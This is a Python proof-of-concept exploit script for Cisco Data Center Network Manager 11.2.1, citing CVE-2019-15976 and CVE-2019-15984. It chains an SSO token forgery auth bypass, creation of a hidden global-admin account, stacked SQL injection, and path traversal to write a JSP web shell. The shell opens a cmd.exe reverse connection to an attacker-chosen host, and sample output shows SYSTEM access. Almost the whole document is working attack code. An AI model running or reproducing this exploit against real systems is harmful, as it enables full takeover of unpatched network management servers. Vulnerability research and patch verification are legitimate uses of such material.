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#!/usr/bin/python """ Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit) - Release: 11.2(1) - Release Date: 18-Jun-2019 - FileName: dcnm-installer-x64-windows.11.2.1.exe.zip - Size: 1619.36 MB (1698022100 bytes) - MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 Bug 1: CVE-2019-15976 / ZDI-20-008 Bug 2: CVE-2019-15984 / ZDI-20-060 Example: ======== saturn:~ mr_me$ ./poc.py (+) usage: ./poc.py <target> <connectback> (+) eg: ./poc.py saturn:~ mr_me$ ./poc.py (+) created the account hacker:Hacked123 (+) created the 1337/custom path! (+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c (+) SQL Injection working! (+) wrote the si.jsp shell! (+) cleaned up the database! (+) starting handler on port 1337 (+) connection from (+) pop thy shell! Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami whoami nt authority\system C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service> Clean Up: ========= 1. delete from xmlDocs where user_name = '1337'; 2. delete si.jsp from the web root 3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337 """ import re import md5 import sys import time import socket import base64 import requests import telnetlib from threading import Thread from xml.etree import ElementTree from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def _get_jsp(cbh, cbp): """ get me some jsp for a connectback! """ jsp = """ <%%@page import="java.lang.*"%%> <%%@page import="java.util.*"%%> <%%@page import="java.io.*"%%> <%%@page import="java.net.*"%%> <%% // clean up String[] files = { "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml", "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/", "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/", }; for (String s:files){ File f = new File(s); f.delete(); } File f = new File(application.getRealPath("/" + this.getClass().getSimpleName().replaceFirst("_","."))); f.delete(); class StreamConnector extends Thread { InputStream we; OutputStream uo; StreamConnector( InputStream we, OutputStream uo ) { this.we = we; this.uo = uo; } public void run() { BufferedReader dy = null; BufferedWriter zvi = null; try { dy = new BufferedReader( new InputStreamReader( this.we ) ); zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) ); char buffer[] = new char[8192]; int length; while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 ) { zvi.write( buffer, 0, length ); zvi.flush(); } } catch( Exception e ){} try { if( dy != null ) dy.close(); if( zvi != null ) zvi.close(); } catch( Exception e ){} } } try { String ShellPath; ShellPath = new String("cmd.exe"); Socket socket = new Socket( "%s", %s); Process process = Runtime.getRuntime().exec( ShellPath ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %%> """ % (cbh, cbp) return jsp def get_session(target, user, password): """ we have bypassed auth at this point and created an admin """ d = { "j_username" : user, "j_password" : password } uri = "https://%s/j_spring_security_check" % target r = requests.post(uri, data=d, verify=False, allow_redirects=False) if "Set-Cookie" in r.headers: match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,4}:.{44});", r.headers["Set-Cookie"]) if match: sessionid = match.group(1) resttoken = match.group(2) return { "JSESSIONID" : sessionid, "resttoken": resttoken} return False def craft_soap_header(): soap_header = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' soap_header += '<m:ssoToken xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:ssoToken>' % gen_ssotoken() soap_header += '\t</SOAP-ENV:Header>' return soap_header def we_can_trigger_folder_path_creation(target): """ craft the path location and db entry for the traversal """ soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">' soap_body += craft_soap_header() soap_body += '\t<soapenv:Body>' soap_body += '\t\t<ep:saveReportTemplate>' soap_body += '\t\t\t<reportTemplateName>si</reportTemplateName>' soap_body += '\t\t\t<userName>1337</userName>' soap_body += '\t\t\t<updatedAttrs></updatedAttrs>' soap_body += '\t\t\t<pmInterval>1337</pmInterval>' soap_body += '\t\t</ep:saveReportTemplate>' soap_body += '\t</soapenv:Body>' soap_body += '</soapenv:Envelope>' uri = "https://%s/ReportWSService/ReportWS" % target r = requests.post(uri, data=soap_body, verify=False) if r.status_code == 200: return True return False def we_can_trigger_second_order_write(target, shellpath): """ trigger the traversal """ soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">' soap_body += craft_soap_header() soap_body += '\t<soapenv:Body>' soap_body += '\t\t<ep:openReportTemplate>' soap_body += '\t\t\t<reportTemplateName>%s</reportTemplateName>' % shellpath soap_body += '\t\t\t<userName>1337</userName>' soap_body += '\t\t</ep:openReportTemplate>' soap_body += '\t</soapenv:Body>' soap_body += '</soapenv:Envelope>' uri = "https://%s/ReportWSService/ReportWS" % target r = requests.post(uri, data=soap_body, verify=False) if r.status_code == 200: return True return False def gen_ssotoken(): """ auth bypass """ timestamp = 9999999999999 # we live forever username = "hax" # doesnt even need to exist! sessionid = 1337 # doesnt even need to exist! d = "%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" % (username, sessionid, timestamp) return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username) def we_can_trigger_sql_injection(target, sql): """ stacked sqli primitive """ sqli = ";%s--" % sql soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">' soap_body += craft_soap_header() soap_body += '\t<soapenv:Body>' soap_body += '\t\t<ep:getVmHostData>' soap_body += '\t\t\t<arg0>' soap_body += '\t\t\t\t<sortField>vcluster</sortField>' soap_body += '\t\t\t\t<sortType>%s</sortType>' % sqli soap_body += '\t\t\t</arg0>' soap_body += '\t\t\t<arg1></arg1>' soap_body += '\t\t\t<arg2></arg2>' soap_body += '\t\t\t<arg3>false</arg3>' soap_body += '\t\t</ep:getVmHostData>' soap_body += '\t</soapenv:Body>' soap_body += '</soapenv:Envelope>' uri = "https://%s/DbInventoryWSService/DbInventoryWS" % target r = requests.post(uri, data=soap_body, verify=False) if r.status_code == 200: return True return False def we_can_leak_vfs(target): """ we use a information disclosure for the vfs path """ global vfs uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345') r = requests.get(uri, verify=False, auth=c) match = re.search(r"temp\\(.{21}content-.{15,16})", r.text) if match: vfs = str(match.group(1).replace("\\","/")) return True return False def handler(lp): """ this is the client handler, to catch the connectback """ print "(+) starting handler on port %d" % lp t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("", lp)) s.listen(1) conn, addr = s.accept() print "(+) connection from %s" % addr[0] t.sock = conn print "(+) pop thy shell!" t.interact() def exec_code(t, usr, pwd, cbp): """ this function threads the client handler and sends off the attacking payload """ handlerthr = Thread(target=handler, args=(int(cbp),)) handlerthr.start() r = requests.get("https://%s/si.jsp" % t, cookies=get_session(t, usr, pwd), verify=False) def we_can_add_user(target, usr, pwd): """ add a user so that we can reach our backdoor! """ soap_body = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">' soap_body += craft_soap_header() soap_body += '\t<soapenv:Body>' soap_body += '\t\t<ep:addUser>' soap_body += '\t\t\t<userName>%s</userName>' % usr soap_body += '\t\t\t<password>%s</password>' % pwd soap_body += '\t\t\t<roleName>global-admin</roleName>' soap_body += '\t\t\t<enablePwdExpiration>false</enablePwdExpiration>' soap_body += '\t\t</ep:addUser>' soap_body += '\t</soapenv:Body>' soap_body += '</soapenv:Envelope>' uri = "https://%s/DbAdminWSService/DbAdminWS" % target r = requests.post(uri, data=soap_body, verify=False) tree = ElementTree.fromstring(r.content) for elem in tree.iter(): if elem.tag == "resultMessage": res = elem.text if res == "Success": return True elif res == "User already exists.": return True return False def main(): usr = "hacker" pwd = "Hacked123" if len(sys.argv) != 3: print "(+) usage: %s <target> <connectback>" % sys.argv[0] print "(+) eg: %s" % sys.argv[0] sys.exit(1) t = sys.argv[1] c = sys.argv[2] cbh = c.split(":")[0] cbp = c.split(":")[1] sc = _get_jsp(cbh, cbp).encode("hex") # stage 1 - add a user if we_can_add_user(t, usr, pwd): print "(+) created the account %s:%s" % (usr, pwd) # stage 2 - trigger folder creation and db entry if we_can_trigger_folder_path_creation(t): print "(+) created the 1337/custom path!" # stage 3 - leak the vfs path (not really required I suppose) if we_can_leak_vfs(t): print "(+) leaked vfs! %s" % vfs # stage 4 - trigger the sql injection to update our template entry sp = "../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp" % vfs sql = "update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';" % (sp, sc) if we_can_trigger_sql_injection(t, sql): print "(+) SQL Injection working!" # stage 5 - trigger the shell write if we_can_trigger_second_order_write(t, sp): print "(+) wrote the si.jsp shell!" # stage 6 - cleanup sql = "delete from xmldocs where user_name='1337';" if we_can_trigger_sql_injection(t, sql): print "(+) cleaned up the database!" # stage 7 - go get some rce exec_code(t, usr, pwd, cbp) if __name__ == "__main__": main()

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